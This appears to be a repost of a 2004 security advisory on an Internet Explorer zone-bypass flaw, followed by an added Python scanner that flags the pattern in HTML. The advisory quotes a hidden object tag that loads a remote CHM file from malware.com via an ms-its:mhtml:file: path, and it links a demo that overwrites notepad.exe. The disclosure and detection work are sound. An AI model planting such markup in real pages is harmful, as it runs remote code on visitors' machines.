http://www.securityfocus.com/archive/1/358862

Code:
<!-- 

GET / HTTP/1.1 
HTTP/1.1 200 OK 
Server: My Bitchin' IE Infector 
Date: Sat Mar 27 13:22:27 2004 
Content-type: text/html 
Accept-Encoding: identity 
Accept-ranges: bytes 

<<snip content>> 

-->

<<reinsert content>> 



<object data="ms-its:mhtml:file://C:foo.mhtml!
http://www.malware.com//foo.chm::/foo.html" type="text/x-
scriptlet" style="visibility:hidden">

This is brilliant. Simplicity at its best. While the original
is not particularly robust the above container should remedy
that. In typical fashion Internet Explorer and its 'masters'
can simply be fooled into thinking they are in the 'local zone'
via a non-existent file on the drive. Quite trivial to achieve
and at the same time absolutely brilliant. This is all quite
reminiscent of the Ibiza Trojan from beginning February 2004
which would make this unpatched problem well over one month now.

Fully functional working demo, harmless .exe which over-writes
notepad.exe, the 'guts' of this particular demo which will be
flagged by any competent anti-virus suite should not be
considered the solution. The manufacturer of this particular
product that allows for all of this should be the one to address
it - once and for all - at the core level:


http_://www.malware.com/junk-de-lux.html
If you visit www.malware.com/junk-de-lux.html, disable ActiveX. Your AV may detect it NAV but still allow it to run.
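
For filtering on the defensive side, the following added example (not part of the original post or advisory) scans HTML for attribute values that use an InfoTech Storage handler and flags the shape quoted above, a local mhtml:file: path followed by '!' and a remote URL. It goes beyond the post by also matching the ms-itss:, its: and mk:@MSITStore: handler names; the function names, verdict labels and the sample markup with its example.test host are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# The post shows only "ms-its:"; the other InfoTech Storage handler names are
# an extension added here so a filter does not miss the equivalent spellings.
ITS_SCHEMES = ("ms-its:", "ms-itss:", "its:", "mk:@msitstore:")
REMOTE_AFTER_BANG = re.compile(r"!(?:https?|ftp)://")

def classify(value):
    """Return None, 'its-handler' or 'its-local-remote' for one attribute value."""
    v = re.sub(r"\s+", "", value).lower()  # undo line wraps inside the attribute
    scheme = next((s for s in ITS_SCHEMES if v.startswith(s)), None)
    if scheme is None:
        return None
    rest = v[len(scheme):]
    # Shape from the post: local mhtml:file: path, then '!' and a remote URL.
    if rest.startswith("mhtml:file:") and REMOTE_AFTER_BANG.search(rest):
        return "its-local-remote"
    return "its-handler"

class _Scanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        line, _ = self.getpos()  # line where the tag starts
        for name, value in attrs:
            verdict = classify(value or "")
            if verdict:
                self.hits.append((line, tag, name, verdict))

def scan_html(html):
    scanner = _Scanner()
    scanner.feed(html)
    scanner.close()
    return scanner.hits  # (line, tag, attribute, verdict) tuples

# Constructed sample: placeholder host and file names, wrapped like the post.
SAMPLE = """<html><body>
<a href="http://example.test/help.html">help</a>
<object data="ms-its:mhtml:file://C:placeholder.mhtml!
http://example.test//placeholder.chm::/placeholder.html" type="text/x-
scriptlet" style="visibility:hidden"></object>
<a href="ms-its:C:/docs/manual.chm::/index.html">local manual</a>
</body></html>"""

if __name__ == "__main__":
    print(*scan_html(SAMPLE), sep="\n")
```

A plain 'its-handler' verdict marks any use of the handler in web content, which a gateway may want to log; 'its-local-remote' is the combination worth blocking outright.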